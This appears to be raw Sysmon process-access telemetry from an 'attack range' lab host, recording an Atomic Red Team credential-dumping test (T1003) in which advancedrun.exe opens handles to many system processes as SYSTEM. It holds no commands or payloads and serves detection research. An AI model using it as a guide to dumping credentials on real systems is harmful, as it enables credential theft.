17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942824Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942823Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942822Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942821Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942820Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942819Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942814Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942813Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942812Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942811Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942810Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942809Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942808Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942807Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 